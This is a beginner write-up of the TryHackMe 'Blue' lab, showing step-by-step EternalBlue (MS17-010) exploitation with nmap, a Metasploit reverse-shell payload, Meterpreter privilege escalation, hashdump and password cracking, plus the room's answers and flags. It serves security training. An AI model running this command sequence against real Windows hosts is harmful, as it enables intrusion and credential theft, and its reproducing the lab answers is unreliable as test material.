Tryhackme Blue

TryHackMe — Blue Writeup

Blue is one of the most popular beginner-friendly machines on TryHackMe and focuses on exploiting the famous EternalBlue vulnerability (MS17-010).

This room teaches reconnaissance, exploitation, privilege escalation, password cracking, and post-exploitation using Metasploit and Meterpreter.

Warning: For educational purposes only.

---

Task 1 — Recon

The first step is performing reconnaissance against the target machine.

Nmap Scan

nmap -sV -sC --script vuln -oN blue.nmap YOUR_MACHINE_IP

This scan identifies:

• Open Ports;
• Running Services;
• Service Versions;
• Potential Vulnerabilities.

Questions & Answers

Q: How many ports below 1000 are open?

A: 3

Q: What vulnerability affects the machine?

A: ms17-010

---

Task 2 — Gain Access

The target is vulnerable to the famous EternalBlue SMB exploit.

Starting Metasploit

msfconsole

Searching for EternalBlue

search eternalblue

Selected Exploit

Q: What is the full exploit path?

A:

exploit/windows/smb/ms17_010_eternalblue

Configuring the Exploit

use exploit/windows/smb/ms17_010_eternalblue

set RHOSTS YOUR_MACHINE_IP

Q: Which required option must be configured?

A: RHOSTS

Setting the Payload

set payload windows/x64/shell/reverse_tcp

Running the Exploit

run

After successful exploitation, a reverse shell is obtained on the target system.

---

Task 3 — Privilege Escalation

The next step is upgrading the shell to a Meterpreter session.

Shell to Meterpreter Conversion

Q: Which post module converts the shell into Meterpreter?

A:

post/multi/manage/shell_to_meterpreter

Required Option

Q: Which option must be configured?

A: SESSION

Converting the Session

use post/multi/manage/shell_to_meterpreter

set SESSION 1

run

Privilege Escalation

getsystem

This confirms escalation to:

NT AUTHORITY\SYSTEM

Process Migration

To stabilize the Meterpreter session:

ps
migrate PROCESS_ID

Migrating into a stable SYSTEM process helps avoid crashes and session instability.

---

Task 4 — Password Cracking

Once SYSTEM privileges are obtained, password hashes can be extracted.

Dumping Password Hashes

hashdump

Q: What is the non-default username?

A: Jon

Q: What is the cracked password?

A: alqfna22

The NTLM hash can be cracked using:

• John the Ripper;
• Hashcat;
• Online cracking services.

---

Task 5 — Finding Flags

The final task involves locating flags hidden throughout the Windows system.

Flag 1

Location: System Root

Flag:

flag{access_the_machine}

---

Flag 2

Location: SAM Database Area

Flag:

flag{sam_database_elevated_access}

---

Flag 3

Location: Administrator Documents

Flag:

flag{admin_documents_can_be_valuable}

---

Key Concepts Learned

• Reconnaissance with Nmap;
• SMB Enumeration;
• EternalBlue Exploitation;
• Meterpreter Usage;
• Privilege Escalation;
• Hash Dumping;
• Password Cracking;
• Windows Post-Exploitation.

---

About EternalBlue (MS17-010)

EternalBlue is one of the most well-known Windows SMB vulnerabilities ever discovered.

It was originally developed by the NSA and later leaked by the Shadow Brokers group.

The vulnerability was heavily used during major cyberattacks such as:

• WannaCry Ransomware;
• NotPetya;
• Mass SMB Worm Campaigns.

---

Final Thoughts

Blue is an excellent room for beginners who want to learn practical exploitation and post-exploitation techniques using Metasploit and Meterpreter.

This room helps build foundational skills in:

• Ethical Hacking;
• Penetration Testing;
• Windows Exploitation;
• Privilege Escalation;
• SMB Exploitation;
• Cybersecurity Operations.

---

SEO Tags

TryHackMe, Blue, EternalBlue, MS17-010, Metasploit, Meterpreter, SMB Exploit, Ethical Hacking, Penetration Testing, Cybersecurity, Windows Exploitation, Hashdump, Red Team, Offensive Security, WannaCry

I hope this writeup helped you understand EternalBlue exploitation and Windows post-exploitation techniques.